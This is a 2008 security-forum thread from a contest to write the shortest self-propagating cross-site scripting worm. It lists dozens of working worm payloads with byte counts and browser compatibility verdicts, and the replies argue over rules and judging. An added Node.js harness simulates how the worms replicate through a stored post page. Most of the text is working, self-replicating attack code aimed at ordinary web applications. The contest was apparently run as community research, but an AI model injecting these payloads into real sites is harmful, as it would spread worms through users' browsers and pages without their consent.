<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">


ma1 - 164 (works with opera and safari also) Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="/" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">


ma1 - 163 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">


sdc (via dev80) - 142 Doesn't work in Firefox 2.0.0.11
<script>function p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>


dev80 - 145 Doesn't work in Firefox 2.0.0.11
<script>function p() {x=new XMLHttpRequest;x.open("post","past.htm");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>


ma1 (via sdc) - 158 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>


barbarianbob - 171 Works in FF with no growth but doesn't work in IE7.0
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>


sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</SCRIPT>


sdc (via ronald) - 103 Grows
<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>


sdc (via spyware) - 159 Doesn't work in Firefox 2.0.0.11
<form method="POST" name="content" action="post.php"><img src="." onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">


spyware - 149 Doesn't work in Firefox 2.0.0.11
<form method=POST name=content action=post.php <img src=. onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>


ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>


ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>


ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>


spyware - 116 Doesn't work in Firefox 2.0.0.11
<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>


gareth - 229 Doesn't work in Firefox 2.0.0.11 (double encoded)
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>



gareth - 206 Doesn't work in Firefox 2.0.0.11
<script>(function(){alert('XSS');with(document)write('<form method=post action=post.php><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>'),forms[0].submit()})()</script>


Ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>


gareth - 164 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()" src>


ronald - 119 Grows
<form name="i"><input name="content"><marquee onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">


ronald - 107 Grows
<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">


gareth - 167 Doesn't work in Firefox 2.0.0.11 (double encoded) if you remove escape it shrinks, but does not work in IE7.0
<form><input name=content type=image onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()" src>


gareth - 222 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()" src=></form>



spikeman - 143 Doesn't work in Firefox 2.0.0.11
<form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>


ronald - 81 Grows
<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>


bwb labs - 168 Doesn't work in Firefox 2.0.0.11
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>


bwb labs - 193 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>


sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><input name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>


sdc - 159 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>


ritz - 162 Works in FF with no growth but does not work in IE7.0
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()" type="image">


sdc (barbarianbob) - 178 Works in FF with no growth but stops working in IE7.0 after first iteration
<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>


barbarianbob - 165 Grows
<b<form action=post.php method=post><img src=. onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form</b>


ritz - 176 Doesn't work in Firefox 2.0.0.11
<b><img onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src="">
<form><input name="content"></form></b>


ma1 - 181 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>


ritz - 187 Works in FF with no growth and shrinks in IE7.0!!!
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>


ritz - 181 Doesn't work in Firefox 2.0.0.11
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>


.mario - 166 Doesn't work in Firefox 2.0.0.11
<b<img src=m onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form</b



ma1 - 173 Grows
<b><form method=post action=post.php><img src=. onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form></b>


bwb labs - 188 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>


ma1 - 174 Grows
<b><img src=. onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form></b>


ritz - 191 Grows
<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>


arantius - 178 Breaks DOM knowledge rule
<p><form method=post action=post.php><input name=content><script>alert('XSS');F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;f.submit();</script>


barbarianbob - 185 Grows
<b><img src onerror="alert('xss');n=(m=this.parentNode).lastChild;n.content.value='<b>'+m.innerHTML+'</b>';n.submit()"
<form method=post action=post.php><input name=content></form></b>



ritz - 194 Grows
<i><img src=. onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


.mario - 150 Grows
<form method=post action=post.php><img src=x onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;i.submit()><input name=content></form>


ritz - 196 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


ritz - 195 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror=alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


matt preston - 223 Doesn't work in Firefox 2.0.0.11
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>


gareth - 265 Doesn't work in Firefox 2.0.0.11
<script>function(){alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURIComponent(a)+' name=content></form>');this.onload=function(){document.f.submit()}}()</script>


digi7al64 - 266 Doesn't work in Firefox 2.0.0.11
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 10, 2008 05:15PM

*RSnake, you said I was 'so close'. That is not the case, that vector requires user interaction.

Cheers Ma1 and SirDarckcat!



Edited 1 time(s). Last edit at 01/10/2008 05:16PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:23PM

It required user interaction but then on the second propagation it didn't... it was closer than a lot of others of its kind. Anyway, don't take my comments to heart, it was more so I could keep them straight in my head. I have no idea how many worms that ended up being but I was getting pretty tired about half way through it.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 10, 2008 05:28PM

I don't blame you :), it's a lotta worm for one guy to handle. Anyway, maybe you should post the traffic log of this board, to compare traffic before and during the contest :P. The amount of views and posts is ridiculous!

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 05:30PM

Quote

.mario -154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

huh? I tested several times - in how far does this one (and several other slice-using ones) not work on IE7?

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:32PM

Hahah, id will have to do that when he gets some spare time. I think it did go up, but I have no idea how much.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 10, 2008 05:32PM

not to brag or anything but I believe I submitted the largest non working vector!

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:35PM

.mario - I have no idea why it doesn't work, but when I close the iframe it gives me this error

'_.0' is null or undefined

I was getting that error a lot with parentnode in IE7.0

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 05:41PM

I am pretty much clueless what to say right now without making myself a laughing stock but this vector works like a shine.

IE 5.5
IE 6
IE 7.0.5730.11
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) 
Opera 9.25.8827

This is what I tested with:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body>
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
</body>
</html>

My test script which is exactly the same as yours + the judges by SDC just confirm it works.

Anyway - whatever. Congrats to ma1 and SDC.

Pretty much baffled greetings,
.mario



Edited 2 time(s). Last edit at 01/10/2008 05:46PM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:42PM

.mario - maybe you need something around your worm to start it? I started it on a blank page other than the worm (to simulate both - must propagate in both environments, with and without content on the page). Maybe that has something to do with it?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 05:53PM

Quote

maybe you need something around your worm to start it?

WTF!? It was never said to make the worm work on a blank site - otherwise we all could have used the <form id=m>with(m) option (equals quirksmode) - sure the worm needs at least a body tag to work - if this wasn't supposed to be it should have been mentioned (parentNode throws an error w/o body tag - what a wonder!). I think we discussed way more circumstantial stuff in this thread...



Edited 3 time(s). Last edit at 01/10/2008 05:57PM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 10, 2008 05:58PM

@.mario

it was discussed a number of times in the thread that the worm should be able to run with no other code on the page other than itself.

rsnake also stated that url decoding would occur meaning the + would have been converted to blank spaces which on my test rig also made yours fail (which was later recanted).

Either way, don't take it to heart, nobody got a prize, it was all for shits and giggles and we probably all learnt something on the way, and if there was 1 lesson to learn from this episode it is that we all work together to define competition rules before we actually start the next competition... oh and we should have 1 unique url to test our code.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/10/2008 06:04PM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 10, 2008 05:59PM

How plausible is it that we encounter a website with injection possibilities that has no <body> tag? I think that chance is very, very slim.

EDIT: Don't get me wrong, I like the contest AND the results. I just want to state I see where Mario is going.



Edited 1 time(s). Last edit at 01/10/2008 06:05PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 06:03PM

Whatever.

over and out,
.mario

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 06:10PM

@.mario - I think this falls under the "must not use knowledge of the DOM unless you name a class or an id and use the class or id. No looking for the n-th script on the page as that will change from site to site". Maybe I wasn't clear about this, but I thought I had made it clear that you shouldn't rely on anything (hence the DOCTYPE discussion and body=onload discussions - where you never know what's going to be on the page).

@Spyware - this is applicable in things like response splitting (granted that's not very often stored XSS, unless you are talking about injecting into proxies).

I hope no one got hurt over this, the whole point of the contest was to get diminutive worms. We have a winner that fit the criteria and many others who fit in other use cases. That's not a bad thing IMHO.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: thrill
Date: January 10, 2008 06:14PM

Quote

it's a lotta worm for one guy to handle.

Good thing rsnake has id to help out with large worms.. ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: Diminutive XSS Worm Replication Contest
Posted by: krazl
Date: January 10, 2008 08:35PM

Rsnake,

Is it true we just create a post.php file, put this code in and run? It seems an infinite loop to me. I can't get a clear picture of how the worm propagates itself.. Please explain. thx in advance.

i'm noob,
krazl
www.krazl.com

http://www.krazl.com

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 09:08PM

It will be an infinite loop for you, unless the worm uses XMLHttpRequest. The point isn't so much that it's quiet, but that it propagates. It posts itself to post.php which would then be viewed by someone else, and so on. We are using reflected XSS as an example but in reality it would be stored. So if you were the victim you'd start on some one else's view.php which had the vector, which posted to post.php which would then put that vector on your version of view.php and someone else would view it and post it to theirs and so on. Make sense?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 10, 2008 11:25PM

A few notes on the testing, note that I was mostly interested in (my own & shorter) XMLHttpRequest methods:
Quote
rsnake
bwb labs - 254 Grows
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>
bwb labs - 253 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
bwb labs - 256 Doesn't work in Firefox 2.0.0.11
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>
I tested all my vectors, all work on Firefox 2.0.0.11, Internet Explorer 7, Opera 9.5 and Safari 3.0.4, and all without growing pains.


Quote
rsnake
ma1 - 209 Works in FF with no growth but doesn't work in IE7.0
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"
Works in my FF2 & IE7 on the judge page. It's a surprising vector that works (on these two browsers). Lucky thing that the encoding isn't a problem (so just avoiding &+ seems to be enough). Note: both Opera 9.5 & Safari 3.0.4 translate the <b> in the innerHTML to &gt;b&lt; which breaks the slice.


So that makes my XMLHttpRequest vectors (251 & 254 bytes) at least the smallest cross browser vectors ;-).

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 11, 2008 05:04AM

All in all I really enjoyed the contest and it was great to compete with some fantastic coders :) More please!!!

There were a couple of issues though which I'd like to point out:-
1. Rules should be static and discussed before the contest begins.
2. 2 forums should be used, 1 for discussion and 1 for entry.
3. The entry forum should only allow 1 post per user and the user updates their post with multiple entries.
4. A demo testing site should be created which allows a coder to test for the rules.
5. Time limit should be decreased to help the hackaholics.
6. Mario won. :P

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 05:46AM

@.mario

The worm had to run standalone because the next page (post.php) could be doctypeless and only a simple PHP page where any doctype sensitive worm would perish. e.g. like I said a dozen times: only #ID selectors would fail as a worm, so that ruled out 80% of all vectors.

@RSnake

Since the rules were, to say the least, 'vague', this thread could have been about 40% smaller IMO, so don't blame us for the faulty vectors, it was due to absent/incomplete rules c.q. faulty interpretations, largely hardly our coding mistake, with a few exceptions that is.

Anyway, it was nice!

Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 11, 2008 05:48AM

Woo, that was a lot of fun. I learned quite a bit, so I definitely consider this a worthwhile contest. Congrats to ma1 and SDK! I hope we do more community things like this in the future.

-Dan

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 06:06AM

RSnake u said this one works on both: (it's mine 203XHR btw)

<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

But that's impossible due to the + which becomes a space, I hope you considered the + issue in combination with innerHTML?
For brevity, it is important that one checks the response one gets from the post.php page.

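The propagation loop RSnake describes above (post.php stores the body, someone else views it, it posts itself again) and the "+ becomes a space" problem Ronald raises can both be checked without a browser. The following is an added example, not code from this thread or from any of the entrants: it is a small Node.js model of the contest harness in which `postPhp` decodes the form body the way PHP does ('+' to space, then percent-decoding), `viewAndRun` plays the next victim's browser by running the first script on the stored page, and `propagate` follows the worm for several generations and reports whether the stored page stays byte-for-byte identical (the "no growth" criterion). The four payload strings are constructed for this example in the style of the XMLHttpRequest entries (each embeds its own source via `Function.prototype.toString`); `page` stands in for `document.body.innerHTML` and `alert` is stubbed, both assumptions of the model.

```javascript
// Added example, not from the thread: an offline model of the contest harness
// (post.php stores a form-urlencoded body, view.php echoes it back) used to
// check two things the judge tested for: the worm must be a fixed point (the
// stored page is identical every generation, no growth) and it must survive
// PHP's form decoding on the way in.  Runs under Node.js, no DOM needed.

// PHP decodes application/x-www-form-urlencoded bodies by turning '+' into a
// space before percent-decoding.  A payload sent with literal '+' signs (such
// as the concatenation in '<form>'+innerHTML) comes back with spaces instead.
function phpUrlDecode(s) {
  return decodeURIComponent(s.replace(/\+/g, ' '));
}

// post.php: parse the body and return what view.php will render next time.
function postPhp(body) {
  const fields = {};
  for (const pair of body.split('&')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    fields[phpUrlDecode(pair.slice(0, eq))] = phpUrlDecode(pair.slice(eq + 1));
  }
  return fields.content === undefined ? '' : fields.content;
}

// The victim's browser: find the first <script> block on the page, run it and
// hand the body it produces to post.php.  The script sees `page` (standing in
// for document.body.innerHTML) and a stub `alert` (assumptions of this model).
// Returns null when the stored payload no longer parses or runs.
function viewAndRun(page) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(page);
  if (!m) return null;
  let body;
  try {
    body = new Function('page', 'alert', 'return ' + m[1])(page, () => undefined);
  } catch (e) {
    return null;
  }
  return typeof body === 'string' ? postPhp(body) : null;
}

// Seed the store with the injected page and follow it for n generations.
// ok is true only when every stored generation has the same size as the seed.
function propagate(script, n) {
  let page = '<script>' + script + '</script>';
  const sizes = [page.length];
  for (let i = 0; i < n; i++) {
    page = viewAndRun(page);
    if (page === null) return { ok: false, died: i + 1, sizes };
    sizes.push(page.length);
  }
  return { ok: sizes.every((s) => s === sizes[0]), died: null, sizes };
}

// Four constructed payloads that reproduce their own source (w + '' gives the
// function text), each showing one verdict from the results list:
//   RAW    posts the source with literal '+' signs  -> mangled by phpUrlDecode
//   SAFE   wraps the body in encodeURIComponent     -> survives, exact fixed point
//   GROWS  re-posts page + alert('xss'): alert returns undefined, so every
//          generation appends the string "undefined" (a "Grows" verdict)
//   DOUBLE escape()s the payload and the form encoding encodes it again
//          ("double encoded"): what gets stored is the escaped text, no <script>
const RAW    = '(function w(){return "content=<script>("+w+"())</"+"script>"}())';
const SAFE   = '(function w(){return "content="+encodeURIComponent("<script>("+w+"())</"+"script>")}())';
const GROWS  = '(function w(){return "content="+encodeURIComponent(page+alert("xss"))}())';
const DOUBLE = '(function w(){return "content="+encodeURIComponent(escape("<script>("+w+"())</"+"script>"))}())';

// Verdict per payload after four generations, in the wording of the results list.
function verdicts() {
  const out = {};
  for (const [name, src] of Object.entries({ RAW, SAFE, GROWS, DOUBLE })) {
    const r = propagate(src, 4);
    out[name] = r.ok ? 'Works with no growth'
      : r.died !== null ? 'Doesn\'t work (dies at generation ' + r.died + ')'
      : 'Grows';
  }
  return out;
}
```

Save it as harness.js and call `verdicts()` (or `propagate(SAFE, 4)`) from `node -e` or a REPL; SAFE comes back identical every generation, RAW dies as soon as the space-mangled source is executed, GROWS gains nine bytes per generation and DOUBLE stores percent-escaped text that never runs. The model covers only the store-and-decode half of the harness; the browser-side differences the thread argues about (IE7's `parentNode` errors, Opera and Safari re-serialising `<b>` in innerHTML) are outside it.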
Re: Diminutive XSS Worm Replication Contest
Date: January 11, 2008 06:09AM

Dear RSnake n Pals,
thanx 4 the informative contest on the DIMU XSS worm
I still wanna post a "text book type" code on the same which should work

<script>document.write('<form action=post.php method=post name=t><input value="<script>alert('XSS')</script>" name=content></form>');onload=document.t.submit()></script>

Roughly 169 bytes..
Any comments anyone???

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 06:10AM

@Gareth: I definitely like your ideas for the next contest - although I think it'd be difficult to mod phorum to just allow one submission per user for certain threads. Also it would lead to the problem that everyone submits five minutes before the contest ends. Plus the learning effect would be narrowed. (can we automatically apply suggestion 6 next time? *g*)

@Ronald: I partially agree. No DOCTYPE: Yes! But: The problem was that the rule that no body tag needs to be existent wasn't communicated clearly enough. It was kind of given by the 'no DOM knowledge rule' but hard to interpret.

@Dan & RSnake: Yep - more of that kind of stuff please.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 11, 2008 06:26AM

Another thing that bothered me slightly was the following doesn't break the DOM rule because the form would be the only one on the page e.g.:-

<body>
<b>This gets replaced</b>
<script>
document.body.innerHTML='<form>';
document.forms[0].submit();
</script>
</body>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 11, 2008 08:48AM

@bwb labs - I may have quickly skimmed over a few of those because of the src=. (I didn't see you were sending the period through XHR). Whoops! I was trying to eyeball some of them to speed up the testing process (it took me four hours to test the nearly 200 submissions!).

@Gareth - I completely agree with the future way to run this contest (live and learn). I honestly wasn't expecting quite this flurry. I was expecting maybe five or ten posts total. I had no idea so many people would get into this. And yes, I agree, in _most_ circumstances, .mario did win. I sent him an email to say as much too. Had I been more clear I think we would have ended up with a different vector too! But that's all a side effect of the real goal of this challenge (to get some sample worm code without the garbage) and that we did!

@Ronald - I may have missed that (can't test from here due to my stupid cut and paste problem). I did check the responses, but I also had over 200 worms to test, so I may have missed a few small issues here or there.

@.mario - Thanks for understanding, you definitely pushed the envelope in this contest, and I have no doubt you would have had one of the top submissions had I been more clear with the rules.

@Gareth Heyes - regarding that code, what if there is no body (nothing but the code)?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: thornmaker
Date: January 11, 2008 09:15AM

rsnake Wrote:
-------------------------------------------------------
> @Gareth Heyes - regarding that code, what if there
> is no body (nothing but the code)?

you mean, like in the matrix?

s/body/spoon/

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 09:23AM

ghehe

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 11, 2008 09:38AM

I've been using your bodies as batteries for too long - you know too much!

- RSnake
Gotta love it. http://ha.ckers.org
